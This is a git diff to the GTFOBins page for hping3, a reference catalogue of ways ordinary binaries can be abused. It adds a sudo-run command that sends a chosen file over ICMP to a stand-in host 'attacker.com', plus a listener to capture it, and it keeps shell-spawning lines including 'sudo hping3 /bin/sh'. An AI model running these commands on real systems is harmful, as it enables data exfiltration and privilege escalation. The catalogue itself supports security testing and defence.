diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index 46dd377..6ada685 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -8,13 +8,18 @@ functions: - code: | ./hping3 /bin/sh -p - file-read: - - description: It is possible to send specific file contents if hping3 has sufficient permission. - - code: | - sudo hping3 --icmp 127.0.0.1 --listen --signature --safe - sudo hping3 --icmp 127.0.0.1 --d 100 --c 2 --sign signature --file ./file.txt sudo: - code: | sudo hping3 /bin/sh + - description: | + The file is continuously sent, adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with: + + ``` + sudo hping3 --icmp --listen xxx --dump + ``` + code: | + RHOST=attacker.com + LFILE=file_to_read + sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE" ---